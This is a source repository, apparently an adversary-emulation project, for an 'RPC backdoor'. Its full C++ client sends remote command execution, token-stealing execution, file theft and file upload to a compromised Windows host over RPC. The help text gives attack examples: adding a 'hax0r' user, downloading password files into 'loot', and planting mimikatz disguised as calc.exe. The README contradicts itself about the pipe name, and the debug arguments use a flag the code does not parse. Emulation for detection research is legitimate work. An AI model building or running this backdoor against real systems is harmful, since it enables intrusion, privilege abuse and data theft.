├── LICENSE ├── README.md ├── RPC Backdoor.sln ├── RpcClient ├── RpcClient.cpp ├── RpcClient.vcxproj └── RpcClient.vcxproj.user ├── RpcServer ├── Base64.h ├── RpcServer.cpp ├── RpcServer.vcxproj └── RpcServer.vcxproj.user ├── RpcServerDll ├── Base64.h ├── RpcServerDll.vcxproj ├── RpcServerDll.vcxproj.filters ├── RpcServerDll.vcxproj.user ├── dllmain.cpp ├── framework.h ├── pch.cpp └── pch.h ├── RpcServerInterface ├── RpcServerInterface.acf ├── RpcServerInterface.h ├── RpcServerInterface.idl ├── RpcServerInterface.user ├── RpcServerInterface.vcxproj ├── RpcServerInterface_c.c └── RpcServerInterface_s.c ├── RpcServerInterface2 ├── RpcServerInterface2.acf ├── RpcServerInterface2.h ├── RpcServerInterface2.idl ├── RpcServerInterface2.vcxproj ├── RpcServerInterface2.vcxproj.user ├── RpcServerInterface2_c.c └── RpcServerInterface2_s.c └── RpcSharpClient ├── App.config ├── ILMerge.props ├── ILMergeOrder.txt ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── RpcSharpClient.csproj ├── RpcSharpClient.csproj.user ├── fa161e81-6e93-4f41-961c-ee9c2e75de17_1.0.cs └── packages.config /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Elad Shamir 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RPC Backdoor Emulation 2 | 3 | This project is a basic implementation of an "RPC Backdoor" meant to emulate TTPs used by certain groups. 4 | 5 | The project contains an RPC server with five functions: 6 | * Execute a command with `cmd.exe /c` and the `CreateProcess` API call. 7 | * Steal a token and execute a command with `cmd.exe /c` and the `CreateProcessWithTokenW` API call. 8 | * Download a file from the remote host. 9 | * Upload a file to the remote host. 10 | * Terminate the RPC server. 11 | 12 | The server is implemented both as an executable (RpcServer) and a DLL (RpcServerDll). 13 | 14 | The server registers two RPC servers: 15 | 1. RPC over named pipes with the hard-coded pipe name "ncacn_np". (`ncacn_np` is the RPC protocol sequence for named pipes, which the client passes separately from `--pipename`; the client's usage examples connect to `\pipe\atctl`, so confirm the registered pipe name in the server source before relying on it as a detection indicator.) 16 | 2. RPC over TCP/IP with the hard-coded port number 4747. 17 | 18 | The client is implemented both as a native executable (RpcClient) and a .NET executable (RpcSharpClient). 
19 | 20 | -------------------------------------------------------------------------------- /RPC Backdoor.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 12.00 2 | # Visual Studio Version 17 3 | VisualStudioVersion = 17.2.32630.192 4 | MinimumVisualStudioVersion = 10.0.40219.1 5 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcServer", "RpcServer\RpcServer.vcxproj", "{758DB128-9123-4E1B-A6C3-47323714123A}" 6 | EndProject 7 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcClient", "RpcClient\RpcClient.vcxproj", "{758DB129-9123-4E1B-A6C3-47323714123A}" 8 | ProjectSection(ProjectDependencies) = postProject 9 | {758DB128-9123-4E1B-A6C3-47323714123A} = {758DB128-9123-4E1B-A6C3-47323714123A} 10 | EndProjectSection 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcServerInterface", "RpcServerInterface\RpcServerInterface.vcxproj", "{6536EBEC-014E-4D6B-97BE-223137694CA8}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcServerInterface2", "RpcServerInterface2\RpcServerInterface2.vcxproj", "{8558952E-C76B-4976-949F-76A977DA7F8A}" 15 | EndProject 16 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RpcSharpClient", "RpcSharpClient\RpcSharpClient.csproj", "{0ABB9F2A-6913-4174-9431-851F9D3E94B4}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcServerDll", "RpcServerDll\RpcServerDll.vcxproj", "{3C21F82B-B958-457A-82BB-B8A795316D3D}" 19 | EndProject 20 | Global 21 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 22 | Debug|Any CPU = Debug|Any CPU 23 | Debug|Win32 = Debug|Win32 24 | Debug|x64 = Debug|x64 25 | Release|Any CPU = Release|Any CPU 26 | Release|Win32 = Release|Win32 27 | Release|x64 = Release|x64 28 | EndGlobalSection 29 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 30 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|Any CPU.ActiveCfg = 
Debug|x64 31 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|Any CPU.Build.0 = Debug|x64 32 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|Win32.ActiveCfg = Debug|Win32 33 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|Win32.Build.0 = Debug|Win32 34 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|x64.ActiveCfg = Debug|x64 35 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|x64.Build.0 = Debug|x64 36 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|Any CPU.ActiveCfg = Release|x64 37 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|Any CPU.Build.0 = Release|x64 38 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|Win32.ActiveCfg = Release|Win32 39 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|Win32.Build.0 = Release|Win32 40 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|x64.ActiveCfg = Release|x64 41 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|x64.Build.0 = Release|x64 42 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|Any CPU.ActiveCfg = Debug|x64 43 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|Any CPU.Build.0 = Debug|x64 44 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|Win32.ActiveCfg = Debug|Win32 45 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|Win32.Build.0 = Debug|Win32 46 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|x64.ActiveCfg = Debug|x64 47 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|x64.Build.0 = Debug|x64 48 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|Any CPU.ActiveCfg = Release|x64 49 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|Any CPU.Build.0 = Release|x64 50 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|Win32.ActiveCfg = Release|Win32 51 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|Win32.Build.0 = Release|Win32 52 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|x64.ActiveCfg = Release|x64 53 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|x64.Build.0 = Release|x64 54 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|Any CPU.ActiveCfg = Debug|x64 55 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|Any CPU.Build.0 = Debug|x64 
56 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|Win32.ActiveCfg = Debug|Win32 57 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|Win32.Build.0 = Debug|Win32 58 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|x64.ActiveCfg = Debug|x64 59 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|x64.Build.0 = Debug|x64 60 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|Any CPU.ActiveCfg = Release|x64 61 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|Any CPU.Build.0 = Release|x64 62 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|Win32.ActiveCfg = Release|Win32 63 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|Win32.Build.0 = Release|Win32 64 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|x64.ActiveCfg = Release|x64 65 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|x64.Build.0 = Release|x64 66 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|Any CPU.ActiveCfg = Debug|x64 67 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|Any CPU.Build.0 = Debug|x64 68 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|Win32.ActiveCfg = Debug|Win32 69 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|Win32.Build.0 = Debug|Win32 70 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|x64.ActiveCfg = Debug|x64 71 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|x64.Build.0 = Debug|x64 72 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|Any CPU.ActiveCfg = Release|x64 73 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|Any CPU.Build.0 = Release|x64 74 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|Win32.ActiveCfg = Release|Win32 75 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|Win32.Build.0 = Release|Win32 76 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|x64.ActiveCfg = Release|x64 77 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|x64.Build.0 = Release|x64 78 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 79 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|Any CPU.Build.0 = Debug|Any CPU 80 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|Win32.ActiveCfg = Debug|Any 
CPU 81 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|Win32.Build.0 = Debug|Any CPU 82 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|x64.ActiveCfg = Debug|Any CPU 83 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|x64.Build.0 = Debug|Any CPU 84 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|Any CPU.ActiveCfg = Release|Any CPU 85 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|Any CPU.Build.0 = Release|Any CPU 86 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|Win32.ActiveCfg = Release|Any CPU 87 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|Win32.Build.0 = Release|Any CPU 88 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|x64.ActiveCfg = Release|Any CPU 89 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|x64.Build.0 = Release|Any CPU 90 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|Any CPU.ActiveCfg = Debug|x64 91 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|Any CPU.Build.0 = Debug|x64 92 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|Win32.ActiveCfg = Debug|Win32 93 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|Win32.Build.0 = Debug|Win32 94 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|x64.ActiveCfg = Debug|x64 95 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|x64.Build.0 = Debug|x64 96 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|Any CPU.ActiveCfg = Release|x64 97 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|Any CPU.Build.0 = Release|x64 98 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|Win32.ActiveCfg = Release|Win32 99 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|Win32.Build.0 = Release|Win32 100 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|x64.ActiveCfg = Release|x64 101 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|x64.Build.0 = Release|x64 102 | EndGlobalSection 103 | GlobalSection(SolutionProperties) = preSolution 104 | HideSolutionNode = FALSE 105 | EndGlobalSection 106 | GlobalSection(ExtensibilityGlobals) = postSolution 107 | SolutionGuid = {23E0E8DF-5039-4DA6-87B4-B963A6DD4868} 108 | EndGlobalSection 109 | EndGlobal 
110 | -------------------------------------------------------------------------------- /RpcClient/RpcClient.cpp: -------------------------------------------------------------------------------- 1 | // File RpcClient.cpp 2 | #include 3 | #include 4 | 5 | #include "../RpcServerInterface/RpcServerInterface.h" 6 | #include "../RpcServer/Base64.h" 7 | 8 | 9 | void SaveFile(LPSTR path, char* buffer) 10 | { 11 | // Base64 decode the data 12 | macaron::Base64 encoder; 13 | char* decoded; 14 | int length; 15 | length = encoder.Decode(buffer, &decoded); 16 | 17 | // Save the data to the specified path 18 | std::ofstream ofs(path, std::ios::out | std::ios::binary); 19 | ofs.write(decoded, length); 20 | ofs.close(); 21 | } 22 | 23 | static char* ReadFile(LPSTR filename, int* length) 24 | { 25 | size_t size; 26 | 27 | // Open the file 28 | std::ifstream ifs(filename, std::ios::in | std::ios::binary | std::ios::ate); 29 | if (!ifs.is_open()) 30 | { 31 | *length = -1; 32 | return NULL; 33 | } 34 | 35 | // Get the file size 36 | ifs.seekg(0, std::ios::end); 37 | size = ifs.tellg(); 38 | ifs.seekg(0, std::ios::beg); 39 | char* pChars = new char[size]; 40 | 41 | // Read all bytes 42 | ifs.read(pChars, size); 43 | 44 | // Close the file and return the length 45 | ifs.close(); 46 | *length = size; 47 | 48 | // Base64 encode the content before returning it 49 | std::string encoded = pChars; 50 | macaron::Base64 encoder; 51 | encoded = encoder.Encode(pChars, *length); 52 | pChars = strdup(encoded.c_str()); 53 | 54 | return pChars; 55 | } 56 | 57 | void PrintHelp() 58 | { 59 | printf("RPC Backdoor Emulation\n"); 60 | printf("\n"); 61 | printf("Target information:\n"); 62 | printf(" --protocol\n"); 63 | printf(" Can be 'tcp' for RPC over TCP/IP or 'namedpipe' for RPC over Named Pipes \n"); 64 | printf(" --hostname\n"); 65 | printf(" Specifies the hostname or IP address of the target RPC server\n"); 66 | printf(" --port\n"); 67 | printf(" Specifies the port number of the target RPC server 
(required for TCP)\n"); 68 | printf(" --pipename\n"); 69 | printf(" Specifies the pipe name of the target RPC server (required for named pipes)\n"); 70 | printf("\n"); 71 | printf("Functions:\n"); 72 | printf(" The function to be executed is passed via the --function argument.\n"); 73 | printf(" The following functions are implemented:\n"); 74 | printf(" * execute\n"); 75 | printf(" * executewithtoken\n"); 76 | printf(" * download\n"); 77 | printf(" * upload\n"); 78 | printf(" * shutdown\n"); 79 | printf(" \n"); 80 | printf(" Execute\n"); 81 | printf(" The execute function executes a command using 'cmd.exe /c ...'.\n"); 82 | printf(" The --command argument is required. If the commands contains any spaces, wrap it in double quotes (\").\n"); 83 | printf(" \n"); 84 | printf(" Execute with token\n"); 85 | printf(" The execute with token function duplicates the token of a given process ID and executes a command using 'cmd.exe /c ...' via the CreateProcessWithTokenW function.\n"); 86 | printf(" The --command argument is required. If the commands contains any spaces, wrap it in double quotes (\").\n"); 87 | printf(" The --pid argument is required. This argument specifies the process ID of which the token will be duplicated. Make sure the RPC server run in a security context with the permissions and privileges required.\n"); 88 | printf(" \n"); 89 | printf(" Download\n"); 90 | printf(" The download function downloads a file from the RPC server and saves it locally. The file is Base64 encoded/decoded in the process.\n"); 91 | printf(" The --remotepath argument specifies the path of the file to be downloaded (used by the server to read the file).\n"); 92 | printf(" The --localpath argument specifies the path of the file to be saved (used by the client to save the file).\n"); 93 | printf("\n"); 94 | printf(" Upload\n"); 95 | printf(" The upload function uploaded a file to the RPC server and saves it remotely. 
The file is Base64 encoded/decoded in the process.\n"); 96 | printf(" The --remotepath argument specifies the path of the file to be uploaded (used by the server to save the file).\n"); 97 | printf(" The --localpath argument specifies the path of the file to be uploaded (used by the client to read the file).\n"); 98 | printf(" \n"); 99 | printf(" Shutdown\n"); 100 | printf(" The shutdown function instructs the RPC server to terminate the RPC server and exit the thread.\n"); 101 | printf(" \n"); 102 | printf("Examples:\n"); 103 | printf(" Execute a command:\n"); 104 | printf(" RpcClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function execute --command \"net user hax0r /add\"\n"); 105 | printf(" \n"); 106 | printf(" Execute a command with the token of a process with the ID 1220:\n"); 107 | printf(" RpcClient.exe --protocol tcp --hostname 192.168.70.130 --port 4747 --function executewithtoken --command \"net user hax0r /add\" --pid 1220\n"); 108 | printf(" \n"); 109 | printf(" Download a file:\n"); 110 | printf(" RpcClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function download --localpath \"loot\\passwords.txt\" --remotepath \"secrets\\passwords.txt\"\n"); 111 | printf(" \n"); 112 | printf(" Upload a file:\n"); 113 | printf(" RpcClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function upload --localpath \"Tools\\mimikatz.exe\" --remotepath \"calc.exe\"\n"); 114 | printf(""); 115 | } 116 | 117 | int main(int argc, char** argv) 118 | { 119 | RPC_STATUS status; 120 | unsigned char* szStringBinding = NULL; 121 | 122 | char* protocol = NULL; 123 | char* pipename = NULL; 124 | char* hostname = NULL; 125 | char* port = NULL; 126 | char* function = NULL; 127 | char* command = NULL; 128 | char* pid = NULL; 129 | char* remotepath = NULL; 130 | char* localpath = NULL; 131 | char* data = NULL; 132 | 133 | // If not enough arguments are provided, print 
help and exit 134 | if (argc < 2) 135 | { 136 | PrintHelp(); 137 | exit(0); 138 | } 139 | 140 | // Parse command line arguments 141 | for (int i = 1; i < argc; i += 2) 142 | { 143 | // Every flag is expected to be followed by a value 144 | if (i + 1 >= argc) 145 | { 146 | printf("Error: Incorrent number of arguments. See instructions below.\n"); 147 | PrintHelp(); 148 | exit(0); 149 | } 150 | 151 | // Parse all expected arguments 152 | if (strcmp("--protocol", argv[i]) == 0) 153 | { 154 | protocol = strdup(argv[i + 1]); 155 | } 156 | else if (strcmp("--pipename", argv[i]) == 0) 157 | { 158 | pipename = strdup(argv[i + 1]); 159 | } 160 | else if (strcmp("--hostname", argv[i]) == 0) 161 | { 162 | hostname = strdup(argv[i + 1]); 163 | } 164 | else if (strcmp("--port", argv[i]) == 0) 165 | { 166 | port = strdup(argv[i + 1]); 167 | } 168 | else if (strcmp("--function", argv[i]) == 0) 169 | { 170 | function = strdup(argv[i + 1]); 171 | } 172 | else if (strcmp("--command", argv[i]) == 0) 173 | { 174 | command = strdup(argv[i + 1]); 175 | } 176 | else if (strcmp("--pid", argv[i]) == 0) 177 | { 178 | pid = strdup(argv[i + 1]); 179 | } 180 | else if (strcmp("--remotepath", argv[i]) == 0) 181 | { 182 | remotepath = strdup(argv[i + 1]); 183 | } 184 | else if (strcmp("--localpath", argv[i]) == 0) 185 | { 186 | localpath = strdup(argv[i + 1]); 187 | } 188 | else if (strcmp("--data", argv[i]) == 0) 189 | { 190 | data = strdup(argv[i + 1]); 191 | } 192 | } 193 | 194 | // TCP must be accompanied by a hostname and a port 195 | if (strcmp(protocol, "tcp") == 0) 196 | { 197 | if (hostname == NULL || port == NULL) 198 | { 199 | printf("Error: TCP requires providing a hostname/IP address and a port. 
See instructions below.\n"); 200 | PrintHelp(); 201 | exit(1); 202 | } 203 | else 204 | { 205 | // Generate string binding for TCP/IP 206 | status = RpcStringBindingCompose( 207 | NULL, 208 | (RPC_CSTR)"ncacn_ip_tcp", 209 | (RPC_CSTR)hostname, 210 | (RPC_CSTR)port, 211 | NULL, 212 | &szStringBinding); 213 | } 214 | } 215 | // named pipes must be accompanied by a hostname and a pipename 216 | else if (strcmp(protocol, "namedpipe") == 0) 217 | { 218 | if (pipename == NULL || hostname == NULL) 219 | { 220 | printf("Error: Named pipe requires providing a hostname and a pipe name. See instructions below.\n"); 221 | PrintHelp(); 222 | exit(1); 223 | } 224 | else 225 | { 226 | // Generate string binding for named pipes 227 | status = RpcStringBindingCompose( 228 | NULL, 229 | (RPC_CSTR)"ncacn_np", 230 | (RPC_CSTR)hostname, 231 | (RPC_CSTR)pipename, 232 | NULL, 233 | &szStringBinding); 234 | } 235 | } 236 | if (status) 237 | exit(status); 238 | 239 | // RPC Binding with the binding string 240 | status = RpcBindingFromStringBinding( szStringBinding, &hRpcServerInterfaceBinding); 241 | 242 | if (status) 243 | exit(status); 244 | 245 | RpcTryExcept 246 | { 247 | // The execute call must be accompanied by a command 248 | if (strcmp(function, "execute") == 0) 249 | { 250 | if (command == NULL) 251 | { 252 | printf("Error: The execute command requires providing a command. See instructions below.\n"); 253 | PrintHelp(); 254 | } 255 | else 256 | { 257 | LPSTR output = 0; 258 | std::cout << "[+] Sending Execute command: " << command << std::endl; 259 | Execute(&command, &output); 260 | std::cout << "[+] Execute command result: " << output << std::endl; 261 | } 262 | } 263 | // The executewithtoken call must be accompanied by a command and a pid 264 | else if (strcmp(function, "executewithtoken") == 0) 265 | { 266 | if (command == NULL || pid == NULL) 267 | { 268 | printf("Error: The execute command requires providing a command and a process id (pid). 
See instructions below.\n"); 269 | PrintHelp(); 270 | } 271 | else 272 | { 273 | LPSTR output = 0; 274 | std::cout << "[+] Sending Execute command: " << command << std::endl; 275 | int processId = atoi(pid); 276 | ExecuteWithToken(&command, processId, &output); 277 | std::cout << "[+] Execute command result: " << output << std::endl; 278 | } 279 | } 280 | // The download call must be accompanied by a localpath and a remotepath 281 | else if (strcmp(function, "download") == 0) 282 | { 283 | if (localpath == NULL || remotepath == NULL) 284 | { 285 | printf("Error: The download command requires providing a remote path (remotepath) for the file to download and a local path (localpath) where the file will be saved. See instructions below.\n"); 286 | PrintHelp(); 287 | } 288 | else 289 | { 290 | LPSTR buffer = 0; 291 | std::cout << "[+] Sending Download command: " << remotepath << std::endl; 292 | Download(&remotepath, &buffer); 293 | std::cout << "[+] Saving to file: " << localpath << "\n"; 294 | SaveFile(localpath, buffer); 295 | } 296 | } 297 | // The upload call must be accompanied by a localpath and a remotepath 298 | else if (strcmp(function, "upload") == 0) 299 | { 300 | if (localpath == NULL || remotepath == NULL) 301 | { 302 | printf("Error: The upload command requires providing a local path (localpath) for the file to upload and a remote path (remotepath) where the file will be saved on the remote system. 
See instructions below.\n"); 303 | PrintHelp(); 304 | } 305 | else 306 | { 307 | int length = -1; 308 | LPSTR buffer = ReadFile(localpath, &length); 309 | std::cout << "[+] Sending Upload command: " << remotepath << std::endl; 310 | Upload(&remotepath, &buffer); 311 | std::cout << "[+] Upload complete: " << length << " bytes sent" << std::endl; 312 | } 313 | } 314 | // The shutdown call doesn't require any additional arguments 315 | else if (strcmp(function, "shutdown") == 0) 316 | { 317 | Shutdown(); 318 | } 319 | } 320 | RpcExcept(1) 321 | { 322 | std::cerr << "Runtime reported exception " << RpcExceptionCode() << std::endl; 323 | } 324 | RpcEndExcept 325 | 326 | // Free the memory allocated for the string binding 327 | status = RpcStringFree(&szStringBinding); 328 | 329 | if (status) 330 | exit(status); 331 | 332 | // Release the binding handle resources and disconnect from the server 333 | status = RpcBindingFree(&hRpcServerInterfaceBinding); 334 | 335 | if (status) 336 | exit(status); 337 | } 338 | 339 | void* __RPC_USER midl_user_allocate(size_t size) 340 | { 341 | return malloc(size); 342 | } 343 | 344 | void __RPC_USER midl_user_free(void* p) 345 | { 346 | free(p); 347 | } 348 | -------------------------------------------------------------------------------- /RpcClient/RpcClient.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {758DB129-9123-4E1B-A6C3-47323714123A} 23 | Win32Proj 24 | RpcClient 25 | 10.0 26 | 27 | 28 | 29 | Application 30 | MultiByte 31 | v143 32 | 33 | 34 | Application 35 | MultiByte 36 | v143 37 | 38 | 39 | Application 40 | MultiByte 41 | v143 42 | 43 | 44 | Application 45 | MultiByte 46 | v143 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | <_ProjectFileVersion>10.0.40219.1 66 | 
$(SolutionDir)$(Platform)$(Configuration)Exe\ 67 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 68 | true 69 | true 70 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 71 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 72 | false 73 | false 74 | 75 | 76 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 77 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 78 | 79 | 80 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 81 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 82 | 83 | 84 | 85 | Disabled 86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 87 | true 88 | EnableFastChecks 89 | MultiThreadedDebug 90 | true 91 | true 92 | true 93 | 94 | 95 | Level4 96 | EditAndContinue 97 | 98 | 99 | rpcrt4.lib;%(AdditionalDependencies) 100 | $(OutDir)RpcClient.exe 101 | true 102 | $(OutDir)RpcClient.pdb 103 | Console 104 | MachineX86 105 | 106 | 107 | 108 | 109 | Disabled 110 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 111 | EnableFastChecks 112 | MultiThreadedDebug 113 | true 114 | true 115 | true 116 | 117 | 118 | Level4 119 | ProgramDatabase 120 | 121 | 122 | rpcrt4.lib;%(AdditionalDependencies) 123 | $(OutDir)RpcClient.exe 124 | true 125 | $(OutDir)RpcClient.pdb 126 | Console 127 | 128 | 129 | 130 | 131 | MaxSpeed 132 | OnlyExplicitInline 133 | true 134 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 135 | true 136 | MultiThreaded 137 | true 138 | true 139 | true 140 | true 141 | 142 | 143 | Level4 144 | ProgramDatabase 145 | 146 | 147 | rpcrt4.lib;%(AdditionalDependencies) 148 | $(OutDir)RpcClient.exe 149 | true 150 | Console 151 | true 152 | true 153 | MachineX86 154 | 155 | 156 | 157 | 158 | MaxSpeed 159 | OnlyExplicitInline 160 | true 161 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 162 | true 163 | MultiThreaded 164 | true 165 | true 166 | true 167 | true 168 | 169 | 170 | Level4 171 | ProgramDatabase 172 | 173 | 174 | rpcrt4.lib;%(AdditionalDependencies) 175 | $(OutDir)RpcClient.exe 176 | true 177 
| Console 178 | true 179 | true 180 | 181 | 182 | 183 | 184 | 185 | 186 | Level3 187 | Level3 188 | Level3 189 | Level3 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | {8558952e-c76b-4976-949f-76a977da7f8a} 198 | 199 | 200 | {6536ebec-014e-4d6b-97be-223137694ca8} 201 | false 202 | 203 | 204 | 205 | 206 | 207 | -------------------------------------------------------------------------------- /RpcClient/RpcClient.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | --method tcp --hostname localhost --port 4747 --function execute --command "powershell.exe" 5 | WindowsLocalDebugger 6 | 7 | 8 | --method tcp --hostname localhost --port 4747 --function execute --command "powershell.exe" 9 | WindowsLocalDebugger 10 | 11 | 12 | --method tcp --hostname localhost --port 4747 --function execute --command "powershell.exe" 13 | WindowsLocalDebugger 14 | 15 | 16 | --method tcp --hostname localhost --port 4747 --function execute --command "powershell.exe" 17 | WindowsLocalDebugger 18 | 19 | -------------------------------------------------------------------------------- /RpcServer/Base64.h: -------------------------------------------------------------------------------- 1 | #ifndef _MACARON_BASE64_H_ 2 | #define _MACARON_BASE64_H_ 3 | 4 | /** 5 | * The MIT License (MIT) 6 | * Copyright (c) 2016 tomykaira 7 | * 8 | * Permission is hereby granted, free of charge, to any person obtaining 9 | * a copy of this software and associated documentation files (the 10 | * "Software"), to deal in the Software without restriction, including 11 | * without limitation the rights to use, copy, modify, merge, publish, 12 | * distribute, sublicense, and/or sell copies of the Software, and to 13 | * permit persons to whom the Software is furnished to do so, subject to 14 | * the following conditions: 15 | * 16 | * The above copyright notice and this permission notice shall be 17 | * included in all copies or substantial portions of the 
